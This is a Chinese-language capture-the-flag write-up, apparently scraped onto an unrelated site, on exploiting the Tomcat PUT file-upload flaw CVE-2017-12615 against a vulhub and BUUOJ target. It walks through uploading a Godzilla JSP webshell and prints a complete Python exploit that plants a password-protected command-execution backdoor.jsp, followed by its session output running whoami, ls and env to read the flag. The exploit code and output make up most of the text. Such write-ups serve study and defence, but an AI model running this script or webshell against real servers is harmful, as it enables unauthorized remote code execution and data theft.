当前位置：首页 > news >正文

网站上飘窗怎么做wordpress 上传目录权限设置

news 2026/4/8 21:18:52

网站上飘窗怎么做,wordpress 上传目录权限设置,乾县做网站,国外建站用什么最多目录漏洞描述一、漏洞编号#xff1a;CVE-2017-12615 二、漏洞复现 get flag 漏洞描述 CVE-2017-12615#xff1a;远程代码执行漏洞影响范围#xff1a;Apache Tomcat 7.0.0 - 7.0.79 (windows环境) 当 Tomcat 运行在 Windows 操作系统时#xff0c;且启用了 HTTP P…目录漏洞描述一、漏洞编号CVE-2017-12615 二、漏洞复现 get flag 漏洞描述 CVE-2017-12615远程代码执行漏洞影响范围Apache Tomcat 7.0.0 - 7.0.79 (windows环境) 当 Tomcat 运行在 Windows 操作系统时且启用了 HTTP PUT 请求方法例如将 readonly 初始化参数由默认值设置为 false攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。通过 PUT 方法的 Tomcat 任意写入文件漏洞一、漏洞编号CVE-2017-12615 漏洞简述Tomcat设置了写权限readonlyfalse导致我们可以向服务器写入文件。 CVE-2017-12615远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件如WebDAV中所使用的。靶机自搭vulhub 攻击IP本机二、漏洞复现 1、开启漏洞环境 cd/vulhub/tomcat/CVE-2017-12615 docker-compose up -d docker ps 2、进入漏洞页面当你想登录进入会发现直接报错403。 3、进行抓包因为漏洞开启了readonlyfalse这个权限所以我们可以进行远程代码执行。我们可以通过上传哥斯拉jsp包达到RCE目的。那么首先我们就要用哥斯拉生成一个木马当然后缀是jsp的。我们在数据包里把GET类型改成PUT类型后面加上任意自己起的名字例如shell.jsp 如下数据包这个就是修改后的数据包在哥斯拉中我们选择管理—生成—生成—jsp后缀木马做完这一切之后我们去网页访问shell.jsp。会发现没有任何显示这样就对了我们再用哥斯拉进行连接。具体操作目标—添加—填写目标url—连接可以看到我们已经可以进入主机执行任意命令了这样我们就getshell啦 get flag 我们使用exp进行漏洞测试 #CVE-2017-12615 EXP __author__ RX import requests import optparse import timeparse optparse.OptionParser(usage python3 %prog [-h] [-u URL] [-p PORT]) parse.add_option(-u,--url,destURL,helptarget url) parse.add_option(-p,--port,destPORT,helptarget port[default:8080],default8080)options,args parse.parse_args() #验证参数是否完整 if not options.URL or not options.PORT:print(Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n)exit(CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help)url options.URL:options.PORT filename /backdoor.jsp payload filename?pwd023iheaders {User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0} #木马 data %if(023.equals(request.getParameter(pwd))){java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(i)).getInputStream();int a -1;byte[] b new byte[2048];out.print(pre);while((ain.read(b))!-1){out.println(new String(b));}out.print(/pre);}% #上传木马文件 def upload(url):print([*] 目标地址:url)try:respond requests.put(urlfilename/,headersheaders,data data)#print(respond.status_code)if respond.status_code 201 or respond.status_code 204:#print([*] 目标地址:url)print([] 木马上传成功)except Exception as e:print([-] 上传失败)return 0#命令执行 def attack(url,cmd):try:respond requests.get(urlpayloadcmd)if respond.status_code 200:print(str(respond.text).replace(pre,).replace(/pre,).strip())except Exception as e:print([-] 命令执行错误) if upload(url) 0:exit() time.sleep(0.5) print(输入执行命令(quit退出):) while(1):cmd input()if(cmd quit):breakattack(url,cmd) ┌──(root㉿ru)-[~/桌面] └─# python3 exp.py -u http://node5.buuoj.cn -p 26492 [] http://node5.buuoj.cn:26492 存在CVE-2017-12615 Tomcat 任意文件读写漏洞┌──(root㉿ru)-[~/桌面] └─# python3 exp.py -u http://node5.buuoj.cn -p 26492 [*] 目标地址:http://node5.buuoj.cn:26492 [] 木马上传成功输入执行命令(quit退出): whoami rootls LICENSE NOTICE RELEASE-NOTES RUNNING.txt bin conf include lib logs native-jni-lib temp webapps workcd / ls LICENSE NOTICE RELEASE-NOTES RUNNING.txt bin conf include lib logs native-jni-lib temp webapps workpwd /usr/local/tomcatcd /root ls -al total 88 drwxr-sr-x 1 root staff 57 Jul 31 2017 . drwxrwsr-x 1 root staff 20 Jul 31 2017 .. -rw-r----- 1 root root 57092 Jul 24 2017 LICENSE -rw-r----- 1 root root 1723 Jul 24 2017 NOTICE -rw-r----- 1 root root 7064 Jul 24 2017 RELEASE-NOTES -rw-r----- 1 root root 15946 Jul 24 2017 RUNNING.txt drwxr-x--- 2 root root 313 Jul 31 2017 bin drwx--S--- 1 root root 22 Feb 7 08:59 conf drwxr-sr-x 3 root staff 19 Jul 31 2017 include drwxr-x--- 2 root root 4096 Jul 31 2017 lib drwxr-x--- 1 root root 177 Feb 7 08:59 logs drwxr-sr-x 3 root staff 151 Jul 31 2017 native-jni-lib drwxr-x--- 2 root root 30 Jul 31 2017 temp drwxr-x--- 1 root root 18 Jul 24 2017 webapps drwxr-x--- 1 root root 22 Feb 7 08:59 workenv LD_LIBRARY_PATH/usr/local/tomcat/native-jni-lib CATALINA_HOME/usr/local/tomcat LANGC.UTF-8 HOSTNAMEout OPENSSL_VERSION1.1.0f-3 TOMCAT_VERSION8.5.19 GPG_KEYS05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 713DA88BE50911535FE716F5208B0AB1D63011C7 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23 JAVA_HOME/docker-java-home/jre TOMCAT_NATIVE_LIBDIR/usr/local/tomcat/native-jni-lib KUBERNETES_PORT_443_TCP_PROTOtcp KUBERNETES_PORT_443_TCP_ADDR10.240.0.1 TOMCAT_ASC_URLhttps://www.apache.org/dist/tomcat/tomcat-8/v8.5.19/bin/apache-tomcat-8.5.19.tar.gz.asc JAVA_VERSION8u141 TOMCAT_TGZ_URLhttps://www.apache.org/dyn/closer.cgi?actiondownloadfilenametomcat/tomcat-8/v8.5.19/bin/apache-tomcat-8.5.19.tar.gz KUBERNETES_PORTtcp://10.240.0.1:443 PWD/usr/local/tomcat HOME/root KUBERNETES_SERVICE_PORT_HTTPS443 KUBERNETES_PORT_443_TCP_PORT443 CA_CERTIFICATES_JAVA_VERSION20170531nmu1 TOMCAT_MAJOR8 JAVA_DEBIAN_VERSION8u141-b15-1~deb9u1 KUBERNETES_PORT_443_TCPtcp://10.240.0.1:443 FLAGflag{ec56b73b-ec22-49c0-97c4-1f457cc9095b} SHLVL0 KUBERNETES_SERVICE_PORT443 PATH/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin KUBERNETES_SERVICE_HOST10.240.0.1直接运行env即可打印出环境变量 flag{ec56b73b-ec22-49c0-97c4-1f457cc9095b}

查看全文

http://www.w-s-a.com/news/642220/